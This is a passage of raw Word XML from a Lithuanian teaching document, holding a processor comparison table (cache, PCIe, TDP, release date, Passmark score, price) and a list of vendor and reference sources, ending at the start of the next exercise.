                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Atminties cache [L3] talpa </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E5E53C2" w14:textId="6D814900"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32MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DDEC51C" w14:textId="405A86C5"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16 MB Intel® Smart Cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C783644" w14:textId="13DA6A75" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="3F56D931" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="060DF0E3" w14:textId="3D32BBE2" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="3F56D931" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="41D5B72F" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="1A47CF9A" w14:textId="62E109DD" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Valdiklis PCI Express 3.0 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7389168D" w14:textId="5E5E9B7A"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PCIe 4.0 x16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="441F023E" w14:textId="6E7F7102"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PCIe 3.0 x16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37181D5A" w14:textId="2A1F43D4" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="3F56D931" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41E4D3E2" w14:textId="0C79D74A" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="3F56D931" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4805CCA5" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="71ABE931" w14:textId="0559442D" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="00A57E70" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="346334AF" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">tminties </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r w:rsidR="346334AF" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">valdiklis </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B7794EA" w14:textId="76366FE1"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Integruotas procesoriuje / DDR4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BB2A5CB" w14:textId="26E10970"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Integruotas procesoriuje / DDR4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A300F70" w14:textId="396EBA51"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1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C8B8931" w14:textId="224CE7EE"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64B301DA" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="14067173" w14:textId="424012C9" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">TPD lygis </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6392BE34" w14:textId="74FEAF05"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 xml:space="preserve">105W </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6018B693" w14:textId="068D9D65"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 xml:space="preserve">125 W </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41C5C035" w14:textId="622C8400"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1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16438A23" w14:textId="42C7D7EB"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168D5475" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="6BE2A698" w14:textId="585967DC" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Išleidimo metai į rinką </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="179C6716" w14:textId="35B1EAF7"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Q2'19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="411E5994" w14:textId="45A03984"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 xml:space="preserve">Q2'20 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4997E885" w14:textId="17AE27C6"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1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="595FF5EF" w14:textId="05D14549"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1A463AD1" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="2A2498CE" w14:textId="0E3F4DA3" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="7629A60D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Passmark našumo bal</w:t>
            </w:r>
            <w:r w:rsidR="00E643C6" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>as</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DDE1F95" w14:textId="0AA9F164"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23967</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F284BF7" w14:textId="653C2DA2"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19595</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C1B9F36" w14:textId="6203B64C"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1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="426F062D" w14:textId="1D91B1A3"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202EA75A" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="2EA672F7" w14:textId="72DAE1FB" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Kaina </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68EDD062" w14:textId="5D641501" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="0389DEE6" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">$370.00 - $406.00 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B8B7BF5" w14:textId="65A4070F" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">$374.00 - $387.00 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36A67975" w14:textId="1786CAE4"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1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="021B2AEE" w14:textId="5E38A45F" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="3F56D931" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="619CAC07" w14:textId="2E141476" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00AB1DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A741369" w14:textId="77777777" w:rsidR="00A57E70" w:rsidRPr="005A5C28" w:rsidRDefault="00A57E70" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74D1DCF8" w14:textId="05A5F351" w:rsidR="15C4BC91" w:rsidRPr="005A5C28" w:rsidRDefault="26B6688C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F4E0E6" w14:textId="77777777" w:rsidR="0021786A" w:rsidRPr="005A5C28" w:rsidRDefault="14E3DCB7" w:rsidP="00A57E70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">AMD Processors for Desktops. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">AMD. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId43">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.amd.com/en/products/processors-desktop</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64648C14" w14:textId="54FBD011" w:rsidR="0021786A" w:rsidRPr="005A5C28" w:rsidRDefault="14E3DCB7" w:rsidP="00A57E70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Intel® Core™ Processor Family. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Intel. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId44">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.intel.com/content/www/us/en/products/processors/core.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B75F0F0" w14:textId="29C6A49C" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="4BA05428" w:rsidP="00A57E70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">Microprocessor/Co-processor/Microcontroller families. </w:t>
      </w:r>
      <w:r w:rsidR="70467C5B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>CPU-W</w:t>
      </w:r>
      <w:r w:rsidR="4EFC3AC7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="70467C5B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>orld.</w:t>
      </w:r>
      <w:r w:rsidR="70467C5B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidR="70467C5B" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.cpu-world.com/CPUs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0546189D" w14:textId="5FCABF09" w:rsidR="15C4BC91" w:rsidRPr="005A5C28" w:rsidRDefault="4B128B88" w:rsidP="00A57E70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Qualcomm </w:t>
      </w:r>
      <w:r w:rsidR="6F44A98F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Processors. </w:t>
      </w:r>
      <w:r w:rsidR="6F44A98F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Qualcomm. </w:t>
      </w:r>
      <w:r w:rsidR="6F44A98F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId46">
        <w:r w:rsidR="26B6688C" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.qualcomm.com/products/processors</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5181D051" w14:textId="56702230" w:rsidR="15C4BC91" w:rsidRPr="005A5C28" w:rsidRDefault="651C4F87" w:rsidP="00A57E70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">List of MediaTek processors. </w:t>
      </w:r>
      <w:r w:rsidR="465BFAD7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Wikipedia</w:t>
      </w:r>
      <w:r w:rsidR="4BDBF91B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4BDBF91B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId47">
        <w:r w:rsidR="4BDBF91B" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>h</w:t>
        </w:r>
        <w:r w:rsidR="26B6688C" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>ttps://en.wikipedia.org/wiki/List_of_MediaTek_processors</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6337610C" w14:textId="57847CAD" w:rsidR="0B4A386B" w:rsidRPr="005A5C28" w:rsidRDefault="0B4A386B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D1F9394" w14:textId="09857E39" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="7C92591F"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7</w:t>
      </w:r>
      <w:r w:rsidR="5BB0F9F4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="5BB0F9F4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5BB0F9F4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ĮDIEGTI IR KONFIGŪRUOTI </w:t>
      </w:r>
      <w:r w:rsidR="707FD3BA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
